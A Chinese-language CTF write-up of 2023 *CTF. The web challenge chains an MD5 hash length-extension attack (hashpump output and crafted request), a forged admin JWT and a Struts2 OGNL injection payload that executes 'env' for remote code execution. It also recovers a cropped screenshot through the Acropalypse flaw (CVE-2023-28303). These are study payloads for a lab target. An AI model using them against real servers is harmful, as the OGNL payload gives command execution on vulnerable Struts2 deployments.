2023 *CTF

web

jwt2struts

jwt伪造+struts2

image-20230730122639151

一开始提示以需要以admin用户登录,然后源码给出了另一个php路径,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
    if ($username === "admin" && $password != "root") {
         if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
            die ("The secret_key is ". $secret_key);
        }
        else {
            die ("Your cookies don't match up! STOP HACKING THIS SITE.");
        }
    }
    else {
        die ("no no no");
    }
}

使用hash长度拓展攻击

hashpump

1
2
3
hashpump -s e6ccbf12de9d33ec27a5bcfb6a3293df -d root -k 19 -a pcat
2172da389aa982830f221675fd46b1d2
root\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00pcat

生成payload

1
2
3
4
Cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjM3MjgxfQ.DgME42SM0WxvpwPpY0X4fuOG4eliu_SHeEw5v9cVWx0; digest=2172da389aa982830f221675fd46b1d2
Upgrade-Insecure-Requests: 1

username=admin&password=root%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%b8%00%00%00%00%00%00%00pcat

image-20230730122852045

1
sk-he00lctf3r

伪造生成admin的jwt

1
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiIsImV4cCI6MjAwNjIzNzI4MX0.wdwnmjqyCO2fsVgOGjcgKrWJgij9fAyq1QHXIHkqK4Y

最后rce

payload:

1
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())) + '

image-20230730123024618

MISC

old language

1
AN ancient old language

谷歌识图得到字体为 Dragon Alphabet [Thuum]字体

[Dragon Alphabet Thuum] 字体-FFonts.net

image-20230730000045085

对照得到flag

snippingTools

1
Alice在参加某个CTF比赛,她成功的解出了一道题,拿到了flag。她很开心,迫不及待地想要向Bob分享她的喜悦。于是按下了快捷键Shift+Win+S使用了Windows 11的截图工具,截取了整个屏幕,并且保存为文件1.png。然后,考虑到比赛规则中规定flag需要保密,她使用了截图工具中的“裁剪”功能,将flag裁剪掉了一部分,然后将裁剪结果覆盖了原文件1.png并保存。最终,她将1.png发给了Bob。Bob马上就知道了她的整个flag,你知道是如何做到的吗?

搜索可以得到win11 snipping tool存在隐私问题,裁剪覆盖的照片可还原

Windows 11 截图工具隐私错误暴露裁剪的图像内容 - 知乎 (zhihu.com)

(1) Will Dormann 在 Twitter: “Can confirm. Easy test: 1. Copy an image (to have a backup) 2. Open one with Snipping tool 3. Crop it to make it much smaller 4. Click the Save icon 5. Compare file sizes of cropped and original 6. Wonder about the world that you live in https://t.co/g19MTxlzN1" / X

然后找到了它分配的CVE编号:CVE-2023-28303

在github找到了利用脚本frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com)

python3.10下运行工具恢复图片得到flag

image-20230730123629739